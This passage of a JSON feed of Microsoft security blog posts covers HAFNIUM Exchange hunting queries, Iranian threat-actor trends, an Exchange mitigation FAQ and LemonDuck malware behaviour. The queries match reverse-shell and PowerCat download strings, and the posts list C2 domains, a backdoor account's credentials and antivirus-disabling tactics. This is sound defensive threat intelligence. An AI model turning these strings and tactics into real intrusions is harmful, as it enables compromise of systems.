note excessive spawning of wermgr.exe and WerFault.exe could be an indicator of compromise due to the service crashing during deserialization.\n\n### Azure Sentinel advanced hunting 
queries\n\nAzure Sentinel customers can find a Sentinel query containing these indicators in the Azure Sentinel Portal or at this GitHub location: <https://github.com/Azure/Azure-Sentinel/tree/master/Detections/MultipleDataSources/>.\n\nThe queries below rely on process creation auditing (event ID 4688) with the \"Include command line in process creation events\" policy enabled; without that policy the CommandLine field is empty and none of them will match.\n\nLook for Nishang Invoke-PowerShellTcpOneLine in Windows Event Logging:\n\n`SecurityEvent | where EventID == 4688 | where Process has_any (\"powershell.exe\", \"PowerShell_ISE.exe\") | where CommandLine has \"$client = New-Object System.Net.Sockets.TCPClient\"`\n\nLook for downloads of PowerCat in cmd and PowerShell command line logging in Windows Event Logs:\n\n`SecurityEvent | where EventID == 4688 | where Process has_any (\"cmd.exe\", \"powershell.exe\", \"PowerShell_ISE.exe\") | where CommandLine has \"https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1\"`\n\nLook for the Exchange PowerShell snap-in being loaded. It can be used to export mailbox data, so subsequent command lines should be inspected to verify usage:\n\n`SecurityEvent | where EventID == 4688 | where Process has_any (\"cmd.exe\", \"powershell.exe\", \"PowerShell_ISE.exe\") | where isnotempty(CommandLine) | where CommandLine contains \"Add-PSSnapin Microsoft.Exchange.Powershell.Snapin\" | summarize FirstSeen = min(TimeGenerated), LastSeen = max(TimeGenerated) by Computer, Account, CommandLine`\n\n \n\nThe post [HAFNIUM targeting Exchange Servers with 0-day exploits](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": 
"2021-03-02T21:07:53", "type": "mmpc", "title": "HAFNIUM targeting Exchange Servers with 0-day exploits", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-02T21:07:53", "id": "MMPC:28641FE2F73292EB4B26994613CC882B", "href": "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-19T19:23:28", "description": "Over the past year, the Microsoft Threat Intelligence Center (MSTIC) has observed a gradual evolution of the tools, techniques, and procedures employed by malicious network operators based in Iran. At [CyberWarCon 2021](<https://www.cyberwarcon.com/>), MSTIC analysts presented their analysis of these trends in Iranian nation state actor activity during a session titled \u201c_The Iranian evolution: Observed changes in Iranian malicious network operations_\u201d. This blog is intended to summarize the content of that research and the topics covered in their presentation and demonstrate MSTIC\u2019s ongoing efforts to track these actors and protect customers from the related threats.\n\nMSTIC consistently tracks threat actor activity, including the groups discussed in this blog, and works across Microsoft Security products and services to build detections into our products that improve customer protections. 
We are sharing this blog today so that others in the community can also be aware of the latest techniques we have observed being used by Iranian actors.\n\nAs with any observed nation-state actor activity, Microsoft has directly notified customers that have been targeted or compromised, providing them with the information they need to help secure their accounts. Microsoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or a developing cluster of threat activity, allowing MSTIC to track it as a unique set of information until we reach a high confidence about the origin or identity of the actor behind the activity. Once it meets the criteria, a DEV is converted to a named actor.\n\nThree notable trends in Iranian nation-state operators have emerged:\n\n * They are increasingly utilizing ransomware to either collect funds or disrupt their targets.\n * They are more patient and persistent while engaging with their targets.\n * While Iranian operators are more patient and persistent with their social engineering campaigns, they continue to employ aggressive brute force attacks on their targets.\n\n## Ransomware\n\nSince September 2020, MSTIC has observed six Iranian threat groups deploying ransomware to achieve their strategic objectives. These ransomware deployments were launched in waves every six to eight weeks on average.\n\n\n\n_Figure 1: Timeline of ransomware attacks by Iranian threat actors_\n\nIn one observed campaign, PHOSPHORUS targeted the Fortinet FortiOS SSL VPN and unpatched on-premises Exchange Servers globally with the intent of deploying ransomware on vulnerable networks. A recent blog post by the [DFIR Report](<https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/>) describes a similar intrusion in which actors leveraged vulnerabilities in on-premise Exchange Servers to compromise a victim environment and encrypt systems via BitLocker. MSTIC also attributes this activity to PHOSPHORUS. 
PHOSPHORUS operators conducted widespread scanning and ransomed targeted systems through a five-step process: Scan, Exploit, Review, Stage, Ransom.\n\n### Scan\n\nIn the early part of 2021, PHOSPHORUS actors scanned millions of IPs on the internet for Fortinet FortiOS SSL VPN that were vulnerable to [CVE-2018-13379](<https://www.fortiguard.com/psirt/FG-IR-18-384>). This vulnerability allowed the attackers to collect clear-text credentials from the sessions file on vulnerable Fortinet VPN appliances. The actors collected credentials from over 900 Fortinet VPN servers in the United States, Europe, and Israel so far this year. In the last half of 2021, PHOSPHORUS shifted to scanning for unpatched on-premises Exchange Servers vulnerable to ProxyLogon ([CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>)).\n\n### Exploit\n\nWhen they identified vulnerable servers, PHOSPHORUS sought to gain persistence on the target systems. In some instances, the actors downloaded a Plink runner named _MicrosoftOutLookUpdater.exe_. This file would beacon periodically to their C2 servers via SSH, allowing the actors to issue further commands. Later, the actors would download a custom implant via a Base64-encoded PowerShell command. This implant established persistence on the victim system by modifying startup registry keys and ultimately functioned as a loader to download additional tools.\n\n### Review\n\nAfter gaining persistence, PHOSPHORUS actors triaged hundreds of victims to determine which of them were fitting for actions on objectives. On select victims, operators created local administrator accounts with a username of \u201chelp\u201d and password of \u201c_AS_@1394\u201d via the commands below. 
On occasion, actors dumped LSASS to acquire credentials to be used later for lateral movement.\n\n\n\n### Stage and Ransom\n\nFinally, MSTIC observed PHOSPHORUS employing BitLocker to encrypt data and ransom victims at several targeted organizations. BitLocker is a full volume encryption feature meant to be used for legitimate purposes. After compromising the initial server (through vulnerable VPN or Exchange Server), the actors moved laterally to a different system on the victim network to gain access to higher value resources. From there, they deployed a script to encrypt the drives on multiple systems. Victims were instructed to reach out to a specific Telegram page to pay for the decryption key.\n\n\n\n## Patience and persistence\n\nMSTIC has observed PHOSPHORUS threat actors employing social engineering to build rapport with their victims before targeting them. These operations likely required significant investment in the operator\u2019s time and resources to refine and execute. This trend indicates PHOSPHORUS is either moving away from or expanding on their past tactics of sending unsolicited links and attachments in spear-phishing email campaigns to attempt credential theft.\n\n### PHOSPHORUS \u2013 Patient and persistent\n\nPHOSPHORUS sends \u201cinterview requests\u201d to target individuals through emails that contain tracking links to confirm whether the user has opened the file. Once a response is received from the target user, PHOSPHORUS attackers send a link to a benign list of interview questions hosted on a cloud service provider. The attackers continue with several back-and-forth conversations discussing the questions with the target user before finally sending a meeting invite with a link masquerading as a Google Meeting.\n\nOnce the meeting invite is sent, the attackers continuously reach out to the target user, asking them to test the Google Meeting link. 
The attackers contact the targeted user multiple times per day, continuously pestering them to click the link. The attackers even go so far as to offer to call the target user to walk them through clicking the link. The attackers are more than willing to troubleshoot any issues the user has signing into the fake Google Meeting link, which leads to a credential harvesting page.\n\nMSTIC has observed PHOSPHORUS operators become very aggressive in their emails after the initial lure is sent, to the point where they are almost demanding a response from the targeted user.\n\n### CURIUM \u2013 In it for the long run\n\nCURIUM is another Iranian threat actor group that has shown a great deal of patience when targeting users. Instead of phishing emails, CURIUM actors leverage a network of fictitious social media accounts to build trust with targets and deliver malware.\n\nThese attackers have followed this playbook:\n\n * Masquerade as an attractive woman on social media\n * Establish a connection via social media with a target user via LinkedIn, Facebook, etc.\n * Chat with the target daily\n * Send benign videos of the woman to the target to prime them to lower their guard\n * Send malicious files to the target similar to the benign files previously sent\n * Request that the target user open the malicious document\n * Exfiltrate data from the victim machine\n\nThe process above can take multiple months from the initial connection to the delivery of the malicious document. The attackers build a relationship with target users over time by having constant and continuous communications, which allows them to build trust and confidence with the target. 
In many of the cases we have observed, the targets genuinely believed that they were making a human connection and not interacting with a threat actor operating from Iran.\n\nBy exercising patience, building relationships, and pestering targets continuously once a relationship has been formed, Iranian threat actors have had more success in compromising their targets.\n\n## Brute force\n\nIn 2021, MSTIC observed DEV-0343 aggressively targeting Office 365 tenants via an ongoing campaign of password spray attacks. DEV-0343 is a threat actor MSTIC assesses to be likely operating in support of Iranian interests. MSTIC has [blogged about DEV-0343 activity previously](<https://www.microsoft.com/security/blog/2021/10/11/iran-linked-dev-0343-targeting-defense-gis-and-maritime-sectors/>).\n\nAnalysis of Office 365 logs suggests that DEV-0343 is using a red team tool like [o365spray](<https://github.com/0xZDH/o365spray>) to conduct these attacks.\n\nTargeting in this DEV-0343 activity has been observed across defense companies that support United States, European Union, and Israeli government partners producing military-grade radars, drone technology, satellite systems, and emergency response communication systems. Further activity has targeted customers in geographic information systems (GIS), spatial analytics, regional ports of entry in the Persian Gulf, and several maritime and cargo transportation companies with a business focus in the Middle East.\n\nAs we discussed in our previous blog, DEV-0343 operators\u2019 \u2018pattern of life\u2019 is consistent with the working schedule of actors based in Iran. DEV-0343 operator activity peaked Sunday through Thursday between 04:00:00 and 16:00:00 UTC.\n\n\n\n_Figure 2: DEV-0343 observed operating hours in UTC_\n\n\n\n_Figure 3: DEV-0343 observed actor requests per day_\n\nKnown DEV-0343 operators have also been observed targeting the same account on the same tenant being targeted by other known Iranian operators. 
For example, EUROPIUM operators attempted to access a specific account on June 12, 2021 and ultimately gained access to this account on June 13, 2021. DEV-0343 was then observed targeting this same account within minutes of EUROPIUM operators gaining access to it the same day. MSTIC assesses that these observed overlapping activities suggest a coordination between different Iranian actors pursuing common objectives.\n\n## Closing thoughts: Increasingly capable threat actors\n\nAs Iranian operators have adapted both their strategic goals and tradecraft, over time they have evolved into more competent threat actors capable of conducting a full spectrum of operations including:\n\n * Information operations\n * Disruption and destruction\n * Support to physical operations\n\nSpecifically, Iranian operators have proven themselves to be both willing and able to:\n\n * Deploy ransomware\n * Deploy disk wipers\n * Deploy mobile malware\n * Conduct phishing attacks\n * Conduct password spray attacks\n * Conduct mass exploitation attacks\n * Conduct supply chain attacks\n * Cloak C2 communications behind legitimate cloud services\n\nMSTIC thanks CyberWarCon 2021 for the opportunity to present this research to the broader security community. 
Microsoft will continue to monitor all this activity by Iranian actors and implement protections for our customers.\n\n \n\nThe post [Evolving trends in Iranian threat actor activity \u2013 MSTIC presentation at CyberWarCon 2021](<https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-16T16:00:08", "type": "mmpc", "title": "Evolving trends in Iranian threat actor activity \u2013 MSTIC presentation at CyberWarCon 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-11-16T16:00:08", "id": "MMPC:C0F4687B18D53FB9596AD4FDF77092D8", "href": "https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": 
"2021-03-19T22:36:39", "description": "As cybercriminals continue to exploit unpatched on-premises versions of Exchange Server 2013, 2016, and 2019, we continue to actively work with customers and partners to help them secure their environments and respond to associated threats. To date, we have [released a comprehensive Security Update](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2021-exchange-server-security-updates/ba-p/2175901>), a one-click interim [Exchange On-Premises Mitigation Tool](<https://aka.ms/eomtrelease>) for both current and out-of-support versions of on-premises Exchange Servers, and [step-by-step guidance](<https://aka.ms/exchange-customer-guidance>) to help address these attacks.\n\nToday, we have taken an additional step to further support our customers who are still vulnerable and have not yet implemented the complete security update. With the latest security intelligence update, Microsoft Defender Antivirus and System Center Endpoint Protection will **automatically mitigate** CVE-2021-26855 on any vulnerable Exchange Server on which it is deployed. Customers do not need to take action beyond ensuring they have installed the latest security intelligence update (build **1.333.747.0** or newer), if they do not already have automatic updates turned on.\n\n\n\nThe Exchange security update is still the most comprehensive way to protect your servers from these attacks and others fixed in earlier releases. This interim mitigation is designed to help protect customers while they take the time to implement the latest Exchange Cumulative Update for their version of Exchange.\n\nMicrosoft will provide guidance to our security partners so that they have the option to make available similar, simple mitigations in their products as well.\n\nWe are deeply committed to protecting our customers. 
To stay up to date please continue to review the content posted at <https://aka.ms/exchangevulns>.\n\n### Frequently Asked Questions\n\n**Q: If I have Microsoft Defender Antivirus installed on my Exchange Server do I need to take any further action to get this mitigation?**\n\nA: Customers that install Microsoft Defender Antivirus and have automatic definition updates enabled (default setting) do not have to take further action to receive the mitigation.\n\n**Q: My organization manages Microsoft Defender Antivirus definition updates. What do I need to do to ensure I have this mitigation?**\n\nA: Customers that manage Microsoft Defender Antivirus definition updates need to select the new detection build (**1.333.747.0 or newer**) and deploy that to the Exchange Server.\n\n**Q: After this mitigation, do I still need to install the security update?**\n\nA: Yes. This automatic mitigation breaks the attack chain by mitigating CVE-2021-26855. Customers should still prioritize getting current on security updates for Exchange Server to comprehensively address the vulnerabilities.\n\n**Q: When does Microsoft Defender Antivirus apply the mitigation?**\n\nA: Microsoft Defender Antivirus will automatically identify if a vulnerable version of Exchange Server is installed and apply the mitigations the first time the security intelligence update is deployed. The mitigation is deployed once per machine.\n\n**Q: Is cloud protection required to receive the mitigation?**\n\nA: No. However, enabling cloud protection is a best practice that will keep you with the most current protections against the ever-changing threat environment. 
Customers are encouraged to enable cloud protection.\n\n**Q: What can I do if I don\u2019t have Microsoft Defender Antivirus?**\n\nA: Use the One-Click Microsoft Exchange On-Premises Mitigation Tool found [here](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>).\n\nThe post [Automatic on-premises Exchange Server mitigation now in Microsoft Defender Antivirus](<https://www.microsoft.com/security/blog/2021/03/18/automatic-on-premises-exchange-server-mitigation-now-in-microsoft-defender-antivirus/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-18T22:00:47", "type": "mmpc", "title": "Automatic on-premises Exchange Server mitigation now in Microsoft Defender Antivirus", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2021-03-18T22:00:47", "id": "MMPC:FC03200E57A46D16A8CD1A5A0E647BB3", "href": "https://www.microsoft.com/security/blog/2021/03/18/automatic-on-premises-exchange-server-mitigation-now-in-microsoft-defender-antivirus/", "cvss": {"score": 
7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-13T21:41:38", "description": "_[Note: In this two-part blog series, we expose a modern malware infrastructure and provide guidance for protecting against the wide range of threats it enables. [Part 1](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) covered the evolution of the threat, how it spreads, and how it impacts organizations. Part 2 provides a deep dive on the attacker behavior and outlines investigation guidance.] _\n\nLemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. As we discussed in [Part 1](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) of this blog series, in recent months LemonDuck adopted more sophisticated behavior and escalated its operations. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.\n\nLemonDuck spreads in a variety of ways, but the two main methods are (1) compromises that are either edge-initiated or facilitated by bot implants moving laterally within an organization, or (2) bot-initiated email campaigns. After installation, LemonDuck can generally be identified by a predictable series of automated activities, followed by beacon check-in and monetization behaviors, and then, in some environments, human-operated actions.\n\nIn this blog post, we share our in-depth technical analysis of the malicious actions that follow a LemonDuck infection. These include general and automatic behavior, as well as human-operated actions. 
We also provide guidance for investigating LemonDuck attacks, as well as mitigation recommendations for strengthening defenses against these attacks.\n\n\n\n_Figure 2. LemonDuck attack chain from the Duck and Cat infrastructures_\n\n## External or human-initialized behavior\n\nLemonDuck activity initiated from external applications \u2013 as against self-spreading methods like malicious phishing mail \u2013 is generally much more likely to begin with or lead to human-operated activity. These activities always result in more invasive secondary malware being delivered in tandem with persistent access being maintained through backdoors. These human-operated activities result in greater impact than standard infections.\n\nIn March and April 2021, various vulnerabilities related to the [ProxyLogon](<https://security.microsoft.com/threatanalytics3/4ef1fbc5-5659-4d9b-b32e-97a694475955/overview>) set of Microsoft Exchange Server exploits were utilized by LemonDuck to install web shells and gain access to outdated systems. Attackers then used this access to launch additional attacks while also deploying automatic LemonDuck components and malware.\n\nIn some cases, the LemonDuck attackers used renamed copies of the official Microsoft Exchange On-Premises Mitigation Tool to remediate the vulnerability they had used to gain access. They did so while maintaining full access to compromised devices and limiting other actors from abusing the same Exchange vulnerabilities.\n\nThis self-patching behavior is in keeping with the attackers\u2019 general desire to remove competing malware and risks from the device. 
This allows them to limit visibility of the attack to SOC analysts within an organization who might be prioritizing unpatched devices for investigation, or who would overlook devices that do not have a high volume of malware present.\n\nThe LemonDuck operators also make use of many [fileless malware techniques](<https://www.microsoft.com/security/blog/2018/01/24/now-you-see-me-exposing-fileless-malware/#:~:text=%20These%20techniques%20include%3A%20%201%20Reflective%20DLL,provide%20powerful%20means%20for%20delivering%20memory-only...%20More%20>), which can make remediation more difficult. Fileless techniques, which include persistence via registry, scheduled tasks, WMI, and startup folder, remove the need for stable malware presence in the filesystem. These techniques also include utilizing process injection and in-memory execution, which can make removal non-trivial. It is therefore imperative that organizations that were vulnerable in the past also direct action to investigate exactly how patching occurred, and whether malicious activity persists.\n\nOn the basic side of implementation this can mean registry, scheduled task, WMI and startup folder persistence to remove the necessity for stable malware presence in the filesystem. However, many free or easily available RATs and Trojans are now routinely utilizing process injection and in-memory execution to circumvent easy removal. To rival these kinds of behaviors it\u2019s imperative that security teams within organizations review their incident response and malware removal processes to include all common areas and arenas of the operating system where malware may continue to reside after cleanup by an antivirus solution.\n\n## General, automatic behavior\n\nIf the initial execution begins automatically or from self-spreading methods, it typically originates from a file called _Readme.js_. 
This behavior could change over time, as the purpose of this .js file is to obfuscate and launch the PowerShell script that pulls additional scripts from the C2. This JavaScript launches a CMD process that subsequently launches Notepad as well as the PowerShell script contained within the JavaScript.\n\nIn contrast, if infection begins with RDP brute force, Exchange vulnerabilities, or other vulnerable edge systems, the first few actions are typically human-operated or originate from a hijacked process rather than from _Readme.js_. After this, the next few actions that the attackers take, including the scheduled task creation, as well as the individual components and scripts are generally the same.\n\nOne of these actions is to establish fileless persistence by creating scheduled tasks that re-run the initial PowerShell download script. This script pulls its various components from the C2s at regular intervals. The script then checks to see if any portions of the malware were removed and re-enables them. LemonDuck also maintains a backup persistence mechanism through WMI Event Consumers to perform the same actions.\n\nTo host their scripts, the attackers use multiple hosting sites, which as mentioned are resilient to takedown. They also have multiple scheduled tasks to try each site, as well as the WMI events in case other methods fail. If all of those fail, LemonDuck also uses its access methods such as RDP, Exchange web shells, Screen Connect, and RATs to maintain persistent access. These task names can vary over time, but \u201cblackball\u201d, \u201cblutea\u201d, and \u201crtsa\u201d have been persistent throughout 2020 and 2021 and are still seen in new infections as of this report.\n\nLemonDuck attempts to automatically disable Microsoft Defender for Endpoint real-time monitoring and adds whole disk drives \u2013 specifically the _C:\\_ drive \u2013 to the Microsoft Defender exclusion list. 
This action could in effect disable Microsoft Defender for Endpoint, freeing the attacker to perform other actions. [Tamper protection](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide>) prevents these actions, but it\u2019s important for organizations to monitor this behavior in cases where individual users set their own exclusion policy.\n\nLemonDuck then attempts to automatically remove a series of other security products through _CMD.exe_, leveraging _WMIC.exe_. The products that we have observed LemonDuck remove include ESET, Kaspersky, Avast, Norton Security, and MalwareBytes. However, they also attempt to uninstall any product with \u201cSecurity\u201d and \u201cAntiVirus\u201d in the name by running the following commands:\n\n\n\nCustom detections in Microsoft Defender for Endpoint or other security solutions can raise alerts on behaviors indicating interactions with security products that are not deployed in the environment. These alerts can allow the quick isolation of devices where this behavior is observed. While this uninstallation behavior is common in other malware, when observed in conjunction with other LemonDuck TTPs, this behavior can help validate LemonDuck infections.\n\nLemonDuck leverages a wide range of free and open-source penetration testing tools. It also uses freely available exploits and functionality such as coin mining. Because of this, the order and the number of times the next few activities are run can change. The attackers can also change the threat\u2019s presence slightly depending on the version, the method of infection, and timeframe. Many .exe and .bin files are downloaded from C2s via encoded PowerShell commands. 
These domains use a variety of names such as the following:\n\n * ackng[.]com\n * bb3u9[.]com\n * ttr3p[.]com\n * zz3r0[.]com\n * sqlnetcat[.]com\n * netcatkit[.]com\n * hwqloan[.]com\n * 75[.]ag\n * js88[.]ag\n * qq8[.]ag\n\nIn addition to directly calling the C2s for downloads through scheduled tasks and PowerShell, LemonDuck exhibits another unique behavior: the IP addresses of a smaller subset of C2s are calculated and paired with a previously randomly generated and non-real domain name. This information is then added into the Windows Hosts file to avoid detection by static signatures. In instances where this method is seen, there is a routine to update this once every 24 hours. An example of this is below:\n\n\n\nLemonDuck is known to use custom executables and scripts. It also renames and packages well-known tools such as XMRig and Mimikatz. Of these, the three most common are the following, though other packages and binaries have been seen as well, including many with _.ori_ file extensions:\n\n * _IF.BIN _(used for lateral movement and privilege escalation)\n * _KR.BIN _(used for competition removal and host patching)\n * _M[0-9]{1}[A-Z]{1}.BIN, M6.BIN, M6.BIN.EXE, or M6G.Bin_ (used for mining)\n\nExecutables used throughout the infection also use random file names sourced from the initiating script, which selects random characters, as evident in the following code:\n\n\n\n## Lateral movement and privilege escalation\n\n_IF.Bin_, whose name stands for \u201cInfection\u201d, is the most common name used for the infection script during the download process. LemonDuck uses this script at installation and then repeatedly thereafter to attempt to scan for ports and perform network reconnaissance. It then attempts to log onto adjacent devices to push the initial LemonDuck execution scripts.\n\n_IF.Bin_ attempts to move laterally via any additional attached drives. When drives are identified, they are checked to ensure that they aren\u2019t already infected. 
If they aren\u2019t, a copy of _Readme.js_, as well as subcomponents of _IF.Bin_, are downloaded into the drive\u2019s home directory as hidden.\n\nSimilarly, _IF.Bin_ attempts to brute force and use vulnerabilities for SMB, SQL, and other services to move laterally. It then immediately contacts the C2 for downloads.\n\nAnother tool dropped and utilized within this lateral movement component is a bundled Mimikatz, within a _mimi.dat_ file associated with both the \u201cCat\u201d and \u201cDuck\u201d infrastructures. This tool\u2019s function is to facilitate credential theft for additional actions. In conjunction with credential theft, _IF.Bin_ drops additional .BIN files to attempt common service exploits like CVE-2017-8464 (LNK remote code execution vulnerability) to increase privilege.\n\nThe attackers regularly update the internal infection components that the malware scans for. They then attempt brute force or spray attacks, as well as exploits against available SSH, MSSQL, SMB, Exchange, RDP, REDIS and Hadoop YARN for Linux and Windows systems. A sample of ports that recent LemonDuck infections were observed querying include 70001, 8088, 16379, 6379, 22, 445, and 1433.\n\nOther functions built in and updated in this lateral movement component include mail self-spreading. This spreading functionality evaluates whether a compromised device has Outlook. If so, it accesses the mailbox and scans for all available contacts. It sends the initiating infecting file as part of a .zip, .js, or .doc/.rtf file with a static set of subjects and bodies. The mail metadata count of contacts is also sent to the attacker, likely to evaluate its effectiveness, such as in the following command:\n\n\n\n## Competition removal and host patching\n\nAt installation and repeatedly afterward, LemonDuck takes great lengths to remove all other botnets, miners, and competitor malware from the device. 
It does this via _KR.Bin_, the \u201cKiller\u201d script, which gets its name from its function calls. This script attempts to remove services, network connections, and other evidence from dozens of competitor malware via scheduled tasks. It also closes well-known mining ports and removes popular mining services to preserve system resources. The script even removes the mining service it intends to use and simply reinstalls it afterward with its own configuration.\n\nThis \u201cKiller\u201d script is likely a continuation of older scripts that were used by other botnets such as GhostMiner in 2018 and 2019. The older variants of the script were quite small in comparison, but they have since grown, with additional services added in 2020 and 2021. Presently, LemonDuck seems consistent in naming its variant _KR.Bin_. This process spares the scheduled tasks created by LemonDuck itself, including various PowerShell scripts as well as a task called \u201cblackball\u201d, \u201cblutea\u201d, or \u201crtsa\u201d, which has been in use by all LemonDuck\u2019s infrastructures for the last year along with other task names.\n\nThe attackers were also observed manually re-entering an environment, especially in instances where edge vulnerabilities were used as an initial entry vector. The attackers also patch the vulnerability they used to enter the network to prevent other attackers from gaining entry. As mentioned, the attackers were seen using a copy of a Microsoft-provided mitigation tool for Exchange ProxyLogon vulnerability, which they hosted on their infrastructure, to ensure other attackers don\u2019t gain web shell access the way they had. 
If unmonitored, this can lead to a situation where a system no longer appears to be unpatched, so suspicious activity that occurred before patching is ignored or thought to be unrelated to the vulnerability.\n\n## Weaponization and continued impact\n\nA miner implant is downloaded as part of the monetization mechanism of LemonDuck. The implant used is usually XMRig, which is a favorite of GhostMiner malware, the [Phorpiex botnet](<https://www.microsoft.com/security/blog/2021/05/20/phorpiex-morphs-how-a-longstanding-botnet-persists-and-thrives-in-the-current-threat-environment/>), and other malware operators. The file uses any of the following names:\n\n * _M6.bin_\n * _M6.bin.ori_\n * _M6G.bin_\n * _M6.bin.exe_\n * _<File name that follows the regex pattern M[0-9]{1}[A-Z]{1}>.BIN._\n\nOnce the automated behaviors are complete, the threat goes into a consistent check-in behavior, simply mining and reporting out to the C2 infrastructure and mining pools as needed with encoded PowerShell commands such as those below (decoded):\n\n\n\nOther systems that are affected bring in secondary payloads such as Ramnit, which is a very popular Trojan that has been seen being dropped by other malware in the past. Additional backdoors, other malware implants, and activities continue long after initial infection, demonstrating that even a \u201csimple\u201d infection by a coin mining malware like LemonDuck can persist and bring in more dangerous threats to the enterprise.\n\n## Comprehensive protection against a wide-ranging malware operation\n\nThe cross-domain visibility and coordinated defense delivered by [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) is designed for the wide range and increasing sophistication of threats that LemonDuck exemplifies. 
